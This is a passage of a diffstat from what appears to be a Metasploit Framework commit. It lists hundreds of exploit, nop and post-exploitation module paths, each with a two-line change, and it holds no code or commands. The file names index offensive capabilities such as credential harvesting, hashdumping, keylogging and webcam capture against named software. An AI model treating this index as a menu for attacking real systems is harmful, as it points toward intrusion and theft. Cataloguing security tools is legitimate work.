+- modules/exploits/windows/http/sambar6_search_results.rb | 2 +- modules/exploits/windows/http/sap_configservlet_exec_noauth.rb | 2 +- modules/exploits/windows/http/sap_host_control_cmd_exec.rb | 2 +- modules/exploits/windows/http/sapdb_webtools.rb | 2 +- modules/exploits/windows/http/savant_31_overflow.rb | 2 +- modules/exploits/windows/http/servu_session_cookie.rb | 2 +- modules/exploits/windows/http/shoutcast_format.rb | 2 +- modules/exploits/windows/http/shttpd_post.rb | 2 +- modules/exploits/windows/http/solarwinds_fsm_userlogin.rb | 2 +- modules/exploits/windows/http/solarwinds_storage_manager_sql.rb | 2 +- modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- modules/exploits/windows/http/steamcast_useragent.rb | 2 +- modules/exploits/windows/http/sws_connection_bof.rb | 2 +- modules/exploits/windows/http/sybase_easerver.rb | 2 +- modules/exploits/windows/http/sysax_create_folder.rb | 2 +- modules/exploits/windows/http/trackercam_phparg_overflow.rb | 2 +- modules/exploits/windows/http/trackit_file_upload.rb | 2 +- modules/exploits/windows/http/trendmicro_officescan.rb | 2 +- modules/exploits/windows/http/ultraminihttp_bof.rb | 2 +- modules/exploits/windows/http/umbraco_upload_aspx.rb | 2 +- .../exploits/windows/http/vmware_vcenter_chargeback_upload.rb | 2 +- modules/exploits/windows/http/webster_http.rb | 2 +- modules/exploits/windows/http/xampp_webdav_upload_php.rb | 2 +- modules/exploits/windows/http/xitami_if_mod_since.rb | 2 +- .../exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb | 2 +- modules/exploits/windows/http/zenworks_uploadservlet.rb | 2 +- modules/exploits/windows/iis/iis_webdav_upload_asp.rb | 2 +- modules/exploits/windows/iis/ms01_023_printer.rb | 2 +- modules/exploits/windows/iis/ms01_026_dbldecode.rb | 2 +- modules/exploits/windows/iis/ms01_033_idq.rb | 2 +- modules/exploits/windows/iis/ms02_018_htr.rb | 2 +- modules/exploits/windows/iis/ms02_065_msadc.rb | 2 +- modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb | 2 +- modules/exploits/windows/iis/msadc.rb | 2 +- modules/exploits/windows/imap/eudora_list.rb | 2 +- modules/exploits/windows/imap/imail_delete.rb | 2 +- modules/exploits/windows/imap/ipswitch_search.rb | 2 +- modules/exploits/windows/imap/mailenable_login.rb | 2 +- modules/exploits/windows/imap/mailenable_status.rb | 2 +- modules/exploits/windows/imap/mailenable_w3c_select.rb | 2 +- modules/exploits/windows/imap/mdaemon_cram_md5.rb | 2 +- modules/exploits/windows/imap/mdaemon_fetch.rb | 2 +- modules/exploits/windows/imap/mercur_imap_select_overflow.rb | 2 +- modules/exploits/windows/imap/mercur_login.rb | 2 +- modules/exploits/windows/imap/mercury_login.rb | 2 +- modules/exploits/windows/imap/mercury_rename.rb | 2 +- modules/exploits/windows/imap/novell_netmail_append.rb | 2 +- modules/exploits/windows/imap/novell_netmail_auth.rb | 2 +- modules/exploits/windows/imap/novell_netmail_status.rb | 2 +- modules/exploits/windows/imap/novell_netmail_subscribe.rb | 2 +- modules/exploits/windows/isapi/ms00_094_pbserver.rb | 2 +- modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb | 2 +- modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb | 2 +- modules/exploits/windows/isapi/rsa_webagent_redirect.rb | 2 +- modules/exploits/windows/isapi/w3who_query.rb | 2 +- modules/exploits/windows/ldap/imail_thc.rb | 2 +- modules/exploits/windows/ldap/pgp_keyserver7.rb | 2 +- modules/exploits/windows/license/calicclnt_getconfig.rb | 2 +- modules/exploits/windows/license/calicserv_getconfig.rb | 2 +- modules/exploits/windows/license/flexnet_lmgrd_bof.rb | 2 +- modules/exploits/windows/license/sentinel_lm7_udp.rb | 2 +- modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb | 2 +- modules/exploits/windows/local/agnitum_outpost_acs.rb | 2 +- modules/exploits/windows/local/always_install_elevated.rb | 2 +- modules/exploits/windows/local/ask.rb | 2 +- modules/exploits/windows/local/bthpan.rb | 2 +- modules/exploits/windows/local/bypassuac.rb | 2 +- modules/exploits/windows/local/bypassuac_injection.rb | 2 +- modules/exploits/windows/local/bypassuac_vbs.rb | 2 +- modules/exploits/windows/local/current_user_psexec.rb | 2 +- modules/exploits/windows/local/ikeext_service.rb | 2 +- modules/exploits/windows/local/ipass_launch_app.rb | 2 +- modules/exploits/windows/local/lenovo_systemupdate.rb | 2 +- modules/exploits/windows/local/mqac_write.rb | 2 +- modules/exploits/windows/local/ms10_015_kitrap0d.rb | 2 +- modules/exploits/windows/local/ms10_092_schelevator.rb | 2 +- modules/exploits/windows/local/ms11_080_afdjoinleaf.rb | 2 +- modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb | 2 +- modules/exploits/windows/local/ms13_053_schlamperei.rb | 2 +- modules/exploits/windows/local/ms13_081_track_popup_menu.rb | 2 +- modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb | 2 +- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 2 +- modules/exploits/windows/local/ms14_058_track_popup_menu.rb | 2 +- modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb | 2 +- modules/exploits/windows/local/ms15_004_tswbproxy.rb | 2 +- modules/exploits/windows/local/ms15_051_client_copy_image.rb | 2 +- modules/exploits/windows/local/ms15_078_atmfd_bof.rb | 2 +- modules/exploits/windows/local/ms_ndproxy.rb | 2 +- modules/exploits/windows/local/novell_client_nicm.rb | 2 +- modules/exploits/windows/local/novell_client_nwfs.rb | 2 +- modules/exploits/windows/local/ntapphelpcachecontrol.rb | 2 +- modules/exploits/windows/local/nvidia_nvsvc.rb | 2 +- modules/exploits/windows/local/payload_inject.rb | 2 +- modules/exploits/windows/local/powershell_cmd_upgrade.rb | 2 +- modules/exploits/windows/local/powershell_remoting.rb | 2 +- modules/exploits/windows/local/ppr_flatten_rec.rb | 2 +- modules/exploits/windows/local/pxeexploit.rb | 2 +- modules/exploits/windows/local/run_as.rb | 2 +- modules/exploits/windows/local/s4u_persistence.rb | 2 +- modules/exploits/windows/local/service_permissions.rb | 2 +- modules/exploits/windows/local/trusted_service_path.rb | 2 +- modules/exploits/windows/local/virtual_box_guest_additions.rb | 2 +- modules/exploits/windows/local/virtual_box_opengl_escape.rb | 2 +- modules/exploits/windows/local/vss_persistence.rb | 2 +- modules/exploits/windows/local/wmi.rb | 2 +- modules/exploits/windows/lotus/domino_http_accept_language.rb | 2 +- modules/exploits/windows/lotus/domino_icalendar_organizer.rb | 2 +- modules/exploits/windows/lotus/domino_sametime_stmux.rb | 2 +- modules/exploits/windows/lotus/lotusnotes_lzh.rb | 2 +- modules/exploits/windows/lpd/hummingbird_exceed.rb | 2 +- modules/exploits/windows/lpd/niprint.rb | 2 +- modules/exploits/windows/lpd/saplpd.rb | 2 +- modules/exploits/windows/lpd/wincomlpd_admin.rb | 2 +- modules/exploits/windows/misc/achat_bof.rb | 2 +- modules/exploits/windows/misc/actfax_raw_server_bof.rb | 2 +- modules/exploits/windows/misc/agentxpp_receive_agentx.rb | 2 +- modules/exploits/windows/misc/allmediaserver_bof.rb | 2 +- modules/exploits/windows/misc/altiris_ds_sqli.rb | 2 +- modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb | 2 +- modules/exploits/windows/misc/asus_dpcproxy_overflow.rb | 2 +- modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb | 2 +- modules/exploits/windows/misc/avidphoneticindexer.rb | 2 +- modules/exploits/windows/misc/bakbone_netvault_heap.rb | 2 +- modules/exploits/windows/misc/bcaaa_bof.rb | 2 +- modules/exploits/windows/misc/bigant_server.rb | 2 +- modules/exploits/windows/misc/bigant_server_250.rb | 2 +- modules/exploits/windows/misc/bigant_server_dupf_upload.rb | 2 +- modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb | 2 +- modules/exploits/windows/misc/bigant_server_usv.rb | 2 +- modules/exploits/windows/misc/bomberclone_overflow.rb | 2 +- modules/exploits/windows/misc/bopup_comm.rb | 2 +- modules/exploits/windows/misc/borland_interbase.rb | 2 +- modules/exploits/windows/misc/borland_starteam.rb | 2 +- modules/exploits/windows/misc/citrix_streamprocess.rb | 2 +- modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb | 2 +- .../misc/citrix_streamprocess_get_boot_record_request.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess_get_footer.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess_get_objects.rb | 2 +- modules/exploits/windows/misc/doubletake.rb | 2 +- modules/exploits/windows/misc/eiqnetworks_esa.rb | 2 +- modules/exploits/windows/misc/eiqnetworks_esa_topology.rb | 2 +- modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb | 2 +- modules/exploits/windows/misc/eureka_mail_err.rb | 2 +- modules/exploits/windows/misc/fb_cnct_group.rb | 2 +- modules/exploits/windows/misc/fb_isc_attach_database.rb | 2 +- modules/exploits/windows/misc/fb_isc_create_database.rb | 2 +- modules/exploits/windows/misc/fb_svc_attach.rb | 2 +- modules/exploits/windows/misc/gimp_script_fu.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_crs.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_new_folder.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_traversal.rb | 2 +- modules/exploits/windows/misc/hp_imc_uam.rb | 2 +- modules/exploits/windows/misc/hp_loadrunner_magentproc.rb | 2 +- modules/exploits/windows/misc/hp_magentservice.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_1.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_2.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_3.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_4.rb | 2 +- modules/exploits/windows/misc/hp_operations_agent_coda_34.rb | 2 +- modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb | 2 +- modules/exploits/windows/misc/hp_ovtrace.rb | 2 +- modules/exploits/windows/misc/ib_isc_attach_database.rb | 2 +- modules/exploits/windows/misc/ib_isc_create_database.rb | 2 +- modules/exploits/windows/misc/ib_svc_attach.rb | 2 +- modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb | 2 +- modules/exploits/windows/misc/ibm_director_cim_dllinject.rb | 2 +- modules/exploits/windows/misc/ibm_tsm_cad_ping.rb | 2 +- modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb | 2 +- modules/exploits/windows/misc/itunes_extm3u_bof.rb | 2 +- modules/exploits/windows/misc/landesk_aolnsrvr.rb | 2 +- modules/exploits/windows/misc/lianja_db_net.rb | 2 +- .../exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb | 2 +- modules/exploits/windows/misc/mercury_phonebook.rb | 2 +- modules/exploits/windows/misc/mini_stream.rb | 2 +- modules/exploits/windows/misc/mirc_privmsg_server.rb | 2 +- modules/exploits/windows/misc/ms07_064_sami.rb | 2 +- modules/exploits/windows/misc/ms10_104_sharepoint.rb | 2 +- modules/exploits/windows/misc/netcat110_nt.rb | 2 +- modules/exploits/windows/misc/nettransport.rb | 2 +- modules/exploits/windows/misc/nvidia_mental_ray.rb | 2 +- modules/exploits/windows/misc/poisonivy_bof.rb | 2 +- modules/exploits/windows/misc/poppeeper_date.rb | 2 +- modules/exploits/windows/misc/poppeeper_uidl.rb | 2 +- modules/exploits/windows/misc/realtek_playlist.rb | 2 +- modules/exploits/windows/misc/sap_2005_license.rb | 2 +- modules/exploits/windows/misc/sap_netweaver_dispatcher.rb | 2 +- modules/exploits/windows/misc/shixxnote_font.rb | 2 +- .../windows/misc/solidworks_workgroup_pdmwservice_file_write.rb | 2 +- modules/exploits/windows/misc/splayer_content_type.rb | 2 +- modules/exploits/windows/misc/stream_down_bof.rb | 2 +- modules/exploits/windows/misc/talkative_response.rb | 2 +- modules/exploits/windows/misc/tiny_identd_overflow.rb | 2 +- .../exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb | 2 +- modules/exploits/windows/misc/ufo_ai.rb | 2 +- modules/exploits/windows/misc/windows_rsh.rb | 2 +- modules/exploits/windows/misc/wireshark_lua.rb | 2 +- modules/exploits/windows/misc/wireshark_packet_dect.rb | 2 +- modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb | 2 +- modules/exploits/windows/motorola/timbuktu_fileupload.rb | 2 +- modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb | 2 +- modules/exploits/windows/mssql/ms02_039_slammer.rb | 2 +- modules/exploits/windows/mssql/ms02_056_hello.rb | 2 +- modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb | 2 +- .../windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 2 +- modules/exploits/windows/mssql/mssql_linkcrawler.rb | 2 +- modules/exploits/windows/mssql/mssql_payload.rb | 2 +- modules/exploits/windows/mssql/mssql_payload_sqli.rb | 2 +- modules/exploits/windows/mysql/mysql_mof.rb | 2 +- modules/exploits/windows/mysql/mysql_payload.rb | 2 +- modules/exploits/windows/mysql/mysql_start_up.rb | 2 +- modules/exploits/windows/mysql/mysql_yassl_hello.rb | 2 +- modules/exploits/windows/mysql/scrutinizer_upload_exec.rb | 2 +- modules/exploits/windows/nfs/xlink_nfsd.rb | 2 +- modules/exploits/windows/nntp/ms05_030_nntp.rb | 2 +- modules/exploits/windows/novell/file_reporter_fsfui_upload.rb | 2 +- modules/exploits/windows/novell/groupwisemessenger_client.rb | 2 +- modules/exploits/windows/novell/netiq_pum_eval.rb | 2 +- modules/exploits/windows/novell/nmap_stor.rb | 2 +- modules/exploits/windows/novell/zenworks_desktop_agent.rb | 2 +- modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb | 2 +- modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb | 2 +- modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb | 2 +- modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb | 2 +- .../exploits/windows/oracle/client_system_analyzer_upload.rb | 2 +- modules/exploits/windows/oracle/extjob.rb | 2 +- modules/exploits/windows/oracle/osb_ndmp_auth.rb | 2 +- modules/exploits/windows/oracle/tns_arguments.rb | 2 +- modules/exploits/windows/oracle/tns_auth_sesskey.rb | 2 +- modules/exploits/windows/oracle/tns_service_name.rb | 2 +- modules/exploits/windows/pop3/seattlelab_pass.rb | 2 +- modules/exploits/windows/postgres/postgres_payload.rb | 2 +- modules/exploits/windows/proxy/bluecoat_winproxy_host.rb | 2 +- modules/exploits/windows/proxy/ccproxy_telnet_ping.rb | 2 +- modules/exploits/windows/proxy/proxypro_http_get.rb | 2 +- modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb | 2 +- modules/exploits/windows/scada/abb_wserver_exec.rb | 2 +- modules/exploits/windows/scada/citect_scada_odbc.rb | 2 +- .../exploits/windows/scada/codesys_gateway_server_traversal.rb | 2 +- modules/exploits/windows/scada/codesys_web_server.rb | 2 +- modules/exploits/windows/scada/daq_factory_bof.rb | 2 +- modules/exploits/windows/scada/factorylink_csservice.rb | 2 +- modules/exploits/windows/scada/factorylink_vrn_09.rb | 2 +- modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb | 2 +- modules/exploits/windows/scada/iconics_genbroker.rb | 2 +- modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb | 2 +- modules/exploits/windows/scada/igss9_igssdataserver_listall.rb | 2 +- modules/exploits/windows/scada/igss9_igssdataserver_rename.rb | 2 +- modules/exploits/windows/scada/igss9_misc.rb | 2 +- modules/exploits/windows/scada/igss_exec_17.rb | 2 +- modules/exploits/windows/scada/indusoft_webstudio_exec.rb | 2 +- modules/exploits/windows/scada/moxa_mdmtool.rb | 2 +- modules/exploits/windows/scada/procyon_core_server.rb | 2 +- modules/exploits/windows/scada/realwin.rb | 2 +- modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb | 2 +- modules/exploits/windows/scada/realwin_on_fcs_login.rb | 2 +- modules/exploits/windows/scada/realwin_scpc_initialize.rb | 2 +- modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb | 2 +- modules/exploits/windows/scada/realwin_scpc_txtevent.rb | 2 +- modules/exploits/windows/scada/scadapro_cmdexe.rb | 2 +- modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb | 2 +- modules/exploits/windows/scada/winlog_runtime.rb | 2 +- modules/exploits/windows/scada/winlog_runtime_2.rb | 2 +- modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb | 2 +- modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb | 2 +- modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb | 2 +- modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb | 2 +- modules/exploits/windows/sip/aim_triton_cseq.rb | 2 +- modules/exploits/windows/sip/sipxezphone_cseq.rb | 2 +- modules/exploits/windows/sip/sipxphone_cseq.rb | 2 +- modules/exploits/windows/smb/generic_smb_dll_injection.rb | 2 +- modules/exploits/windows/smb/group_policy_startup.rb | 2 +- modules/exploits/windows/smb/ipass_pipe_exec.rb | 2 +- modules/exploits/windows/smb/ms03_049_netapi.rb | 2 +- modules/exploits/windows/smb/ms04_007_killbill.rb | 2 +- modules/exploits/windows/smb/ms04_011_lsass.rb | 2 +- modules/exploits/windows/smb/ms04_031_netdde.rb | 2 +- modules/exploits/windows/smb/ms05_039_pnp.rb | 2 +- modules/exploits/windows/smb/ms06_025_rasmans_reg.rb | 2 +- modules/exploits/windows/smb/ms06_025_rras.rb | 2 +- modules/exploits/windows/smb/ms06_040_netapi.rb | 2 +- modules/exploits/windows/smb/ms06_066_nwapi.rb | 2 +- modules/exploits/windows/smb/ms06_066_nwwks.rb | 2 +- modules/exploits/windows/smb/ms06_070_wkssvc.rb | 2 +- modules/exploits/windows/smb/ms07_029_msdns_zonename.rb | 2 +- modules/exploits/windows/smb/ms08_067_netapi.rb | 2 +- .../exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb | 2 +- .../exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/smb/ms10_061_spoolss.rb | 2 +- .../exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb | 2 +- modules/exploits/windows/smb/psexec.rb | 2 +- modules/exploits/windows/smb/psexec_psh.rb | 2 +- modules/exploits/windows/smb/smb_relay.rb | 2 +- modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb | 2 +- modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb | 2 +- modules/exploits/windows/smtp/mercury_cram_md5.rb | 2 +- modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb | 2 +- modules/exploits/windows/smtp/njstar_smtp_bof.rb | 2 +- modules/exploits/windows/smtp/wmailserver.rb | 2 +- modules/exploits/windows/smtp/ypops_overflow1.rb | 2 +- modules/exploits/windows/ssh/freeftpd_key_exchange.rb | 2 +- modules/exploits/windows/ssh/freesshd_authbypass.rb | 2 +- modules/exploits/windows/ssh/freesshd_key_exchange.rb | 2 +- modules/exploits/windows/ssh/putty_msg_debug.rb | 2 +- modules/exploits/windows/ssh/securecrt_ssh1.rb | 2 +- modules/exploits/windows/ssh/sysax_ssh_username.rb | 2 +- modules/exploits/windows/ssl/ms04_011_pct.rb | 2 +- modules/exploits/windows/telnet/gamsoft_telsrv_username.rb | 2 +- modules/exploits/windows/telnet/goodtech_telnet.rb | 2 +- modules/exploits/windows/tftp/attftp_long_filename.rb | 2 +- modules/exploits/windows/tftp/distinct_tftp_traversal.rb | 2 +- modules/exploits/windows/tftp/dlink_long_filename.rb | 2 +- modules/exploits/windows/tftp/futuresoft_transfermode.rb | 2 +- modules/exploits/windows/tftp/netdecision_tftp_traversal.rb | 2 +- modules/exploits/windows/tftp/opentftp_error_code.rb | 2 +- modules/exploits/windows/tftp/quick_tftp_pro_mode.rb | 2 +- modules/exploits/windows/tftp/tftpd32_long_filename.rb | 2 +- modules/exploits/windows/tftp/tftpdwin_long_filename.rb | 2 +- modules/exploits/windows/tftp/tftpserver_wrq_bof.rb | 2 +- modules/exploits/windows/tftp/threectftpsvc_long_mode.rb | 2 +- modules/exploits/windows/unicenter/cam_log_security.rb | 2 +- modules/exploits/windows/vnc/realvnc_client.rb | 2 +- modules/exploits/windows/vnc/ultravnc_client.rb | 2 +- modules/exploits/windows/vnc/ultravnc_viewer_bof.rb | 2 +- modules/exploits/windows/vnc/winvnc_http_get.rb | 2 +- modules/exploits/windows/vpn/safenet_ike_11.rb | 2 +- modules/exploits/windows/winrm/winrm_script_exec.rb | 2 +- modules/exploits/windows/wins/ms04_045_wins.rb | 2 +- modules/nops/armle/simple.rb | 2 +- modules/nops/php/generic.rb | 2 +- modules/nops/ppc/simple.rb | 2 +- modules/nops/sparc/random.rb | 2 +- modules/nops/tty/generic.rb | 2 +- modules/nops/x64/simple.rb | 2 +- modules/nops/x86/opty2.rb | 2 +- modules/nops/x86/single_byte.rb | 2 +- modules/post/aix/hashdump.rb | 2 +- modules/post/cisco/gather/enum_cisco.rb | 2 +- modules/post/firefox/gather/cookies.rb | 2 +- modules/post/firefox/gather/history.rb | 2 +- modules/post/firefox/gather/passwords.rb | 2 +- modules/post/firefox/gather/xss.rb | 2 +- modules/post/firefox/manage/webcam_chat.rb | 2 +- modules/post/linux/busybox/enum_connections.rb | 2 +- modules/post/linux/busybox/enum_hosts.rb | 2 +- modules/post/linux/busybox/jailbreak.rb | 2 +- modules/post/linux/busybox/ping_net.rb | 2 +- modules/post/linux/busybox/set_dmz.rb | 2 +- modules/post/linux/busybox/set_dns.rb | 2 +- modules/post/linux/busybox/smb_share_root.rb | 2 +- modules/post/linux/busybox/wget_exec.rb | 2 +- modules/post/linux/gather/checkvm.rb | 2 +- modules/post/linux/gather/ecryptfs_creds.rb | 2 +- modules/post/linux/gather/enum_configs.rb | 2 +- modules/post/linux/gather/enum_network.rb | 2 +- modules/post/linux/gather/enum_protections.rb | 2 +- modules/post/linux/gather/enum_psk.rb | 2 +- modules/post/linux/gather/enum_system.rb | 2 +- modules/post/linux/gather/enum_users_history.rb | 2 +- modules/post/linux/gather/enum_xchat.rb | 2 +- modules/post/linux/gather/gnome_commander_creds.rb | 2 +- modules/post/linux/gather/hashdump.rb | 2 +- modules/post/linux/gather/mount_cifs_creds.rb | 2 +- modules/post/linux/gather/pptpd_chap_secrets.rb | 2 +- modules/post/linux/manage/download_exec.rb | 2 +- modules/post/multi/escalate/cups_root_file_read.rb | 2 +- modules/post/multi/escalate/metasploit_pcaplog.rb | 2 +- modules/post/multi/gather/apple_ios_backup.rb | 2 +- modules/post/multi/gather/check_malware.rb | 2 +- modules/post/multi/gather/dbvis_enum.rb | 2 +- modules/post/multi/gather/dns_bruteforce.rb | 2 +- modules/post/multi/gather/dns_reverse_lookup.rb | 2 +- modules/post/multi/gather/dns_srv_lookup.rb | 2 +- modules/post/multi/gather/enum_vbox.rb | 2 +- modules/post/multi/gather/env.rb | 2 +- modules/post/multi/gather/fetchmailrc_creds.rb | 2 +- modules/post/multi/gather/filezilla_client_cred.rb | 2 +- modules/post/multi/gather/find_vmx.rb | 2 +- modules/post/multi/gather/firefox_creds.rb | 2 +- modules/post/multi/gather/gpg_creds.rb | 2 +- modules/post/multi/gather/lastpass_creds.rb | 2 +- modules/post/multi/gather/multi_command.rb | 2 +- modules/post/multi/gather/netrc_creds.rb | 2 +- modules/post/multi/gather/pgpass_creds.rb | 2 +- modules/post/multi/gather/pidgin_cred.rb | 2 +- modules/post/multi/gather/ping_sweep.rb | 2 +- modules/post/multi/gather/remmina_creds.rb | 2 +- modules/post/multi/gather/resolve_hosts.rb | 2 +- modules/post/multi/gather/rsyncd_creds.rb | 2 +- modules/post/multi/gather/run_console_rc_file.rb | 2 +- modules/post/multi/gather/skype_enum.rb | 2 +- modules/post/multi/gather/ssh_creds.rb | 2 +- modules/post/multi/gather/thunderbird_creds.rb | 2 +- modules/post/multi/gather/wlan_geolocate.rb | 2 +- modules/post/multi/general/close.rb | 2 +- modules/post/multi/general/execute.rb | 2 +- modules/post/multi/general/wall.rb | 2 +- modules/post/multi/manage/dbvis_add_db_admin.rb | 2 +- modules/post/multi/manage/dbvis_query.rb | 2 +- modules/post/multi/manage/multi_post.rb | 2 +- modules/post/multi/manage/play_youtube.rb | 2 +- modules/post/multi/manage/record_mic.rb | 2 +- modules/post/multi/manage/set_wallpaper.rb | 2 +- modules/post/multi/manage/shell_to_meterpreter.rb | 2 +- modules/post/multi/manage/sudo.rb | 2 +- modules/post/multi/manage/system_session.rb | 2 +- modules/post/multi/recon/local_exploit_suggester.rb | 2 +- modules/post/osx/admin/say.rb | 2 +- modules/post/osx/capture/keylog_recorder.rb | 2 +- modules/post/osx/capture/screen.rb | 2 +- modules/post/osx/gather/autologin_password.rb | 2 +- modules/post/osx/gather/enum_adium.rb | 2 +- modules/post/osx/gather/enum_airport.rb | 2 +- modules/post/osx/gather/enum_chicken_vnc_profile.rb | 2 +- modules/post/osx/gather/enum_colloquy.rb | 2 +- modules/post/osx/gather/enum_keychain.rb | 2 +- modules/post/osx/gather/enum_osx.rb | 2 +- modules/post/osx/gather/hashdump.rb | 2 +- modules/post/osx/gather/password_prompt_spoof.rb | 2 +- modules/post/osx/gather/safari_lastsession.rb | 2 +- modules/post/osx/manage/mount_share.rb | 2 +- modules/post/osx/manage/record_mic.rb | 2 +- modules/post/osx/manage/vpn.rb | 2 +- modules/post/osx/manage/webcam.rb | 2 +- modules/post/solaris/gather/checkvm.rb | 2 +- modules/post/solaris/gather/enum_packages.rb | 2 +- modules/post/solaris/gather/enum_services.rb | 2 +- modules/post/solaris/gather/hashdump.rb | 2 +- modules/post/windows/capture/keylog_recorder.rb | 2 +- modules/post/windows/capture/lockout_keylogger.rb | 2 +- modules/post/windows/escalate/droplnk.rb | 2 +- modules/post/windows/escalate/getsystem.rb | 2 +- modules/post/windows/escalate/golden_ticket.rb | 2 +- modules/post/windows/escalate/ms10_073_kbdlayout.rb | 2 +- modules/post/windows/escalate/screen_unlock.rb | 2 +- modules/post/windows/gather/arp_scanner.rb | 2 +- modules/post/windows/gather/bitcoin_jacker.rb | 2 +- modules/post/windows/gather/bitlocker_fvek.rb | 2 +- modules/post/windows/gather/cachedump.rb | 2 +- modules/post/windows/gather/checkvm.rb | 2 +- modules/post/windows/gather/credentials/bulletproof_ftp.rb | 2 +- modules/post/windows/gather/credentials/coreftp.rb | 2 +- modules/post/windows/gather/credentials/credential_collector.rb | 2 +- modules/post/windows/gather/credentials/domain_hashdump.rb | 2 +- modules/post/windows/gather/credentials/dyndns.rb | 2 +- modules/post/windows/gather/credentials/enum_cred_store.rb | 2 +- modules/post/windows/gather/credentials/enum_laps.rb | 2 +- modules/post/windows/gather/credentials/enum_picasa_pwds.rb | 2 +- modules/post/windows/gather/credentials/epo_sql.rb | 2 +- modules/post/windows/gather/credentials/filezilla_server.rb | 2 +- modules/post/windows/gather/credentials/flashfxp.rb | 2 +- modules/post/windows/gather/credentials/ftpnavigator.rb | 2 +- modules/post/windows/gather/credentials/ftpx.rb | 2 +- modules/post/windows/gather/credentials/gpp.rb | 2 +- modules/post/windows/gather/credentials/idm.rb | 2 +- modules/post/windows/gather/credentials/imail.rb | 2 +- modules/post/windows/gather/credentials/imvu.rb | 2 +- modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb | 2 +- modules/post/windows/gather/credentials/meebo.rb | 2 +- modules/post/windows/gather/credentials/mremote.rb | 2 +- modules/post/windows/gather/credentials/mssql_local_hashdump.rb | 2 +- modules/post/windows/gather/credentials/nimbuzz.rb | 2 +- modules/post/windows/gather/credentials/outlook.rb | 2 +- modules/post/windows/gather/credentials/razer_synapse.rb | 2 +- modules/post/windows/gather/credentials/razorsql.rb | 2 +- modules/post/windows/gather/credentials/rdc_manager_creds.rb | 2 +- modules/post/windows/gather/credentials/skype.rb | 2 +- modules/post/windows/gather/credentials/smartermail.rb | 2 +- modules/post/windows/gather/credentials/smartftp.rb | 2 +- modules/post/windows/gather/credentials/spark_im.rb | 2 +- modules/post/windows/gather/credentials/sso.rb | 2 +- modules/post/windows/gather/credentials/steam.rb | 2 +- modules/post/windows/gather/credentials/tortoisesvn.rb | 2 +- modules/post/windows/gather/credentials/total_commander.rb | 2 +- modules/post/windows/gather/credentials/trillian.rb | 2 +- modules/post/windows/gather/credentials/vnc.rb | 2 +- modules/post/windows/gather/credentials/windows_autologin.rb | 2 +- modules/post/windows/gather/credentials/winscp.rb | 2 +- modules/post/windows/gather/credentials/wsftp_client.rb | 2 +- modules/post/windows/gather/dnscache_dump.rb | 2 +- modules/post/windows/gather/dumplinks.rb | 2 +- modules/post/windows/gather/enum_ad_bitlocker.rb | 2 +- modules/post/windows/gather/enum_ad_computers.rb | 2 +- modules/post/windows/gather/enum_ad_groups.rb | 2 +- modules/post/windows/gather/enum_ad_managedby_groups.rb | 2 +- modules/post/windows/gather/enum_ad_service_principal_names.rb | 2 +- modules/post/windows/gather/enum_ad_to_wordlist.rb | 2 +- modules/post/windows/gather/enum_ad_user_comments.rb | 2 +- modules/post/windows/gather/enum_ad_users.rb | 2 +- modules/post/windows/gather/enum_applications.rb | 2 +- modules/post/windows/gather/enum_artifacts.rb | 2 +- modules/post/windows/gather/enum_av_excluded.rb | 2 +- modules/post/windows/gather/enum_chrome.rb | 2 +- modules/post/windows/gather/enum_computers.rb | 2 +- modules/post/windows/gather/enum_db.rb | 2 +- modules/post/windows/gather/enum_devices.rb | 